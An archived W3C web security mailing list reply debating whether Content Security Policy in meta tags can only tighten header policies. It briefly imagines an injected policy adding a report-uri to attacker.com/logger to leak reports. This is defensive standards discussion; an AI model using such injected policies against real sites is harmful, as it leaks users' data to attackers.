W3C home > Mailing lists > Public > public-webappsec@w3.org > June 2014

Re: Header Policy Vs. Meta tag policy

From: Devdatta Akhawe <dev.akhawe@gmail.com>
Date: Wed, 11 Jun 2014 10:32:55 -0700
Message-ID: <CAPfop_0uOtPP+TcRLUCauKc_HHgS0J1J_eAfGV0ZyoDwbecksQ@mail.gmail.com>
To: Daniel Veditz <dveditz@mozilla.com>
Cc: Mike West <mkwst@google.com>, Kevin Hill <khill@microsoft.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>
I am not sure if a meta tag policy only constrains further. Joel started a
related thread a while back [1], and I had mentioned a couple of examples
where (it seemed to me) that an injected policy could add behavior instead
of just constraining further [2]. Joel also mentioned that he was
philosophically opposed to making CSP be "only allows you to constrain

To mitigate this concern, should we try to limit what meta tag policies can
do? For example, do we want to allow an injected policy to add a new
report-uri to attacker.com/logger?


[1] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0001.html
[2] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0008.html
[3] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0020.html

On 11 June 2014 09:00, Daniel Veditz <dveditz@mozilla.com> wrote:

> On 6/11/2014 12:20 AM, Mike West wrote:
>> Thanks Dan. I agree with your analysis, and I appreciate you withdrawing
>> your objection.
>> I've made this change in
>> https://github.com/w3c/webappsec/commit/f697c40eea84b6c57480c0e3783993
>> a47ebdc3d5
>> WDYT?
> To be clear, your change does two things and we were mainly talking about
> the first:
>  * allows use of both HTTP and <meta> CSP
>  * allows use of multiple <meta> CSP
> The arguments against (and in favor of) multiple <meta> CSP are pretty
> much the same as the arguments for and against allowing a combination of
> header and <meta> policies. "It's useful, and why not since it can only
> tighten policies" vs. "Injection bug in site might be used to circumvent a
> feature whose main purpose assumes you need protection from injection
> bugs". I'm not objecting to the change, just announcing my intention to sit
> in the corner and fret about the possibility.
> -Dan Veditz
Received on Wednesday, 11 June 2014 17:33:43 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 18:54:39 UTC